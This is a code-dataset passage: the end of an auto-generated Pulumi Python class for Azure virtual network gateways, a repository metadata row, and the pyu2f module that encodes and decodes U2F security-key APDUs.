raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = VirtualNetworkGatewayInitArgs.__new__(VirtualNetworkGatewayInitArgs)
__props__.__dict__["active_active"] = active_active
__props__.__dict__["bgp_settings"] = bgp_settings
__props__.__dict__["custom_routes"] = custom_routes
__props__.__dict__["enable_bgp"] = enable_bgp
__props__.__dict__["enable_dns_forwarding"] = enable_dns_forwarding
__props__.__dict__["gateway_default_site"] = gateway_default_site
__props__.__dict__["gateway_type"] = gateway_type
__props__.__dict__["id"] = id
__props__.__dict__["ip_configurations"] = ip_configurations
__props__.__dict__["location"] = location
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["resource_guid"] = resource_guid
__props__.__dict__["sku"] = sku
__props__.__dict__["tags"] = tags
__props__.__dict__["virtual_network_gateway_name"] = virtual_network_gateway_name
__props__.__dict__["vpn_client_configuration"] = vpn_client_configuration
__props__.__dict__["vpn_gateway_generation"] = vpn_gateway_generation
__props__.__dict__["vpn_type"] = vpn_type
__props__.__dict__["etag"] = None
__props__.__dict__["inbound_dns_forwarding_endpoint"] = None
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-native:network:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20150615:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20160330:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20160601:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20160901:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20161201:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20170301:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20170601:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20170801:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20170901:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20171001:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20171101:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20180101:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20180201:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20180401:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20180601:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20180701:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20180801:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20181001:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20181101:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20181201:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20190201:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20190401:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20190601:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20190701:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20190901:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20191101:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20191201:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20200301:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20200401:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20200501:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20200601:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20200701:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20200801:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20201101:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20210201:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20210301:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20210501:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20210801:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20220101:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20220501:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20220701:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20220901:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20221101:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20230201:VirtualNetworkGateway"), pulumi.Alias(type_="azure-native:network/v20230401:VirtualNetworkGateway"), 
pulumi.Alias(type_="azure-native:network/v20230501:VirtualNetworkGateway")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(VirtualNetworkGateway, __self__).__init__(
'azure-native:network/v20190801:VirtualNetworkGateway',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'VirtualNetworkGateway':
"""
Get an existing VirtualNetworkGateway resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = VirtualNetworkGatewayInitArgs.__new__(VirtualNetworkGatewayInitArgs)
__props__.__dict__["active_active"] = None
__props__.__dict__["bgp_settings"] = None
__props__.__dict__["custom_routes"] = None
__props__.__dict__["enable_bgp"] = None
__props__.__dict__["enable_dns_forwarding"] = None
__props__.__dict__["etag"] = None
__props__.__dict__["gateway_default_site"] = None
__props__.__dict__["gateway_type"] = None
__props__.__dict__["inbound_dns_forwarding_endpoint"] = None
__props__.__dict__["ip_configurations"] = None
__props__.__dict__["location"] = None
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["resource_guid"] = None
__props__.__dict__["sku"] = None
__props__.__dict__["tags"] = None
__props__.__dict__["type"] = None
__props__.__dict__["vpn_client_configuration"] = None
__props__.__dict__["vpn_gateway_generation"] = None
__props__.__dict__["vpn_type"] = None
return VirtualNetworkGateway(resource_name, opts=opts, __props__=__props__)
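    # Usage sketch (illustrative; the resource ID below is a made-up shape):
    #
    #   gw = VirtualNetworkGateway.get(
    #       "imported-gateway",
    #       id="/subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.Network/virtualNetworkGateways/<name>")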
@property
@pulumi.getter(name="activeActive")
def active_active(self) -> pulumi.Output[Optional[bool]]:
"""
ActiveActive flag.
"""
return pulumi.get(self, "active_active")
@property
@pulumi.getter(name="bgpSettings")
def bgp_settings(self) -> pulumi.Output[Optional['outputs.BgpSettingsResponse']]:
"""
Virtual network gateway's BGP speaker settings.
"""
return pulumi.get(self, "bgp_settings")
@property
@pulumi.getter(name="customRoutes")
def custom_routes(self) -> pulumi.Output[Optional['outputs.AddressSpaceResponse']]:
"""
The reference of the address space resource which represents the custom routes address space specified by the customer for virtual network gateway and VpnClient.
"""
return pulumi.get(self, "custom_routes")
@property
@pulumi.getter(name="enableBgp")
def enable_bgp(self) -> pulumi.Output[Optional[bool]]:
"""
Whether BGP is enabled for this virtual network gateway or not.
"""
return pulumi.get(self, "enable_bgp")
@property
@pulumi.getter(name="enableDnsForwarding")
def enable_dns_forwarding(self) -> pulumi.Output[Optional[bool]]:
"""
Whether dns forwarding is enabled or not.
"""
return pulumi.get(self, "enable_dns_forwarding")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[Optional[str]]:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter(name="gatewayDefaultSite")
def gateway_default_site(self) -> pulumi.Output[Optional['outputs.SubResourceResponse']]:
"""
The reference of the LocalNetworkGateway resource which represents local network site having default routes. Assign Null value in case of removing existing default site setting.
"""
return pulumi.get(self, "gateway_default_site")
@property
@pulumi.getter(name="gatewayType")
def gateway_type(self) -> pulumi.Output[Optional[str]]:
"""
The type of this virtual network gateway.
"""
return pulumi.get(self, "gateway_type")
@property
@pulumi.getter(name="inboundDnsForwardingEndpoint")
def inbound_dns_forwarding_endpoint(self) -> pulumi.Output[str]:
"""
The IP address allocated by the gateway to which dns requests can be sent.
"""
return pulumi.get(self, "inbound_dns_forwarding_endpoint")
@property
@pulumi.getter(name="ipConfigurations")
def ip_configurations(self) -> pulumi.Output[Optional[Sequence['outputs.VirtualNetworkGatewayIPConfigurationResponse']]]:
"""
IP configurations for virtual network gateway.
"""
return pulumi.get(self, "ip_configurations")
@property
@pulumi.getter
def location(self) -> pulumi.Output[Optional[str]]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning state of the virtual network gateway resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="resourceGuid")
def resource_guid(self) -> pulumi.Output[Optional[str]]:
"""
The resource GUID property of the virtual network gateway resource.
"""
return pulumi.get(self, "resource_guid")
@property
@pulumi.getter
def sku(self) -> pulumi.Output[Optional['outputs.VirtualNetworkGatewaySkuResponse']]:
"""
The reference of the VirtualNetworkGatewaySku resource which represents the SKU selected for Virtual network gateway.
"""
return pulumi.get(self, "sku")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="vpnClientConfiguration")
def vpn_client_configuration(self) -> pulumi.Output[Optional['outputs.VpnClientConfigurationResponse']]:
"""
The reference of the VpnClientConfiguration resource which represents the P2S VpnClient configurations.
"""
return pulumi.get(self, "vpn_client_configuration")
@property
@pulumi.getter(name="vpnGatewayGeneration")
def vpn_gateway_generation(self) -> pulumi.Output[Optional[str]]:
"""
The generation for this VirtualNetworkGateway. Must be None if gatewayType is not VPN.
"""
return pulumi.get(self, "vpn_gateway_generation")
@property
@pulumi.getter(name="vpnType")
def vpn_type(self) -> pulumi.Output[Optional[str]]:
"""
The type of this virtual network gateway.
"""
return pulumi.get(self, "vpn_type")
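# Usage sketch (hypothetical; names, SKU, and location are illustrative and
# omit the IP configuration a real deployment would also need):
#
#   import pulumi_azure_native as azure_native
#
#   gateway = azure_native.network.v20190801.VirtualNetworkGateway(
#       "exampleGateway",
#       resource_group_name="example-rg",
#       gateway_type="Vpn",
#       vpn_type="RouteBased",
#       sku=azure_native.network.v20190801.VirtualNetworkGatewaySkuArgs(
#           name="VpnGw1", tier="VpnGw1"),
#       location="westus2")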
|
462e385d29a67e98f716cf20fb122c3c7189f7e8
|
3a6a211ea0d32405497fbd6486c490bb147e25f9
|
/third_party/gsutil/third_party/pyu2f/pyu2f/apdu.py
|
fee2abdb160f367fb66dfe8aefe06688015d5155
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] |
permissive
|
catapult-project/catapult
|
e2cbdd5eb89f3b1492fc8752494e62ea1df4bae0
|
53102de187a48ac2cfc241fef54dcbc29c453a8e
|
refs/heads/main
| 2021-05-25T07:37:22.832505
| 2021-05-24T08:01:49
| 2021-05-25T06:07:38
| 33,947,548
| 2,032
| 742
|
BSD-3-Clause
| 2022-08-26T16:01:18
| 2015-04-14T17:49:05
|
HTML
|
UTF-8
|
Python
| false
| false
| 3,878
|
py
|
apdu.py
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implement the U2F variant of ISO 7816 extended APDU.
This module implements a subset ISO 7816 APDU encoding. In particular,
it only supports extended length encoding, it only supports commands
that expect a reply, and it does not support explicitly specifying
the length of the expected reply.
It also implements the U2F variant of ISO 7816 where the Lc field
is always specified, even if there is no data.
"""
import struct
from pyu2f import errors
CMD_REGISTER = 0x01
CMD_AUTH = 0x02
CMD_VERSION = 0x03
class CommandApdu(object):
"""Represents a Command APDU.
Represents a Command APDU sent to the security key. Encoding
is specified in FIDO U2F standards.
"""
cla = None
ins = None
p1 = None
p2 = None
data = None
def __init__(self, cla, ins, p1, p2, data=None):
self.cla = cla
self.ins = ins
self.p1 = p1
self.p2 = p2
if data and len(data) > 65535:
raise errors.InvalidCommandError()
if data:
self.data = data
  def ToByteArray(self):
    """Serialize the command.
    Encodes the command as per the U2F specs, using the standard
    ISO 7816-4 extended encoding. All commands expect a reply, so
    Le is always present.
    Returns:
      Python bytearray of the encoded command.
    """
lc = self.InternalEncodeLc()
out = bytearray(4) # will extend
out[0] = self.cla
out[1] = self.ins
out[2] = self.p1
out[3] = self.p2
if self.data:
out.extend(lc)
out.extend(self.data)
out.extend([0x00, 0x00]) # Le
else:
out.extend([0x00, 0x00, 0x00]) # Le
return out
def ToLegacyU2FByteArray(self):
"""Serialize the command in the legacy format.
Encodes the command as per the U2F specs, using the legacy
encoding in which LC is always present.
Returns:
Python bytearray of the encoded command.
"""
lc = self.InternalEncodeLc()
out = bytearray(4) # will extend
out[0] = self.cla
out[1] = self.ins
out[2] = self.p1
out[3] = self.p2
out.extend(lc)
if self.data:
out.extend(self.data)
out.extend([0x00, 0x00]) # Le
return out
def InternalEncodeLc(self):
dl = 0
if self.data:
dl = len(self.data)
# The top two bytes are guaranteed to be 0 by the assertion
# in the constructor.
fourbyte = struct.pack('>I', dl)
return bytearray(fourbyte[1:])
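# Worked example (illustrative, not from the original module): a VERSION
# command with no data, CommandApdu(0x00, CMD_VERSION, 0x00, 0x00), encodes
# via ToByteArray() to b'\x00\x03\x00\x00\x00\x00\x00' -- the 4-byte header
# plus a 3-byte zero Le, with Lc omitted because there is no data. The same
# command encodes via ToLegacyU2FByteArray() to 9 bytes, since the legacy
# U2F framing always emits the 3-byte Lc field even when it is zero.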
class ResponseApdu(object):
  """Represents a Response APDU.
  Represents a Response APDU sent by the security key. Encoding
  is specified in FIDO U2F standards.
  """
body = None
sw1 = None
sw2 = None
def __init__(self, data):
self.dbg_full_packet = data
if not data or len(data) < 2:
raise errors.InvalidResponseError()
if len(data) > 2:
self.body = data[:-2]
self.sw1 = data[-2]
self.sw2 = data[-1]
def IsSuccess(self):
return self.sw1 == 0x90 and self.sw2 == 0x00
def CheckSuccessOrRaise(self):
if self.sw1 == 0x69 and self.sw2 == 0x85:
raise errors.TUPRequiredError()
elif self.sw1 == 0x6a and self.sw2 == 0x80:
raise errors.InvalidKeyHandleError()
elif self.sw1 == 0x69 and self.sw2 == 0x84:
raise errors.InvalidKeyHandleError()
elif not self.IsSuccess():
raise errors.ApduError(self.sw1, self.sw2)
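# Usage sketch (illustrative): a bare two-byte status word parses with no body.
#
#   ResponseApdu(bytearray([0x90, 0x00])).IsSuccess()   # -> True
#   ResponseApdu(bytearray([0x69, 0x85])).CheckSuccessOrRaise()
#   # raises errors.TUPRequiredError (a test of user presence is required)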
|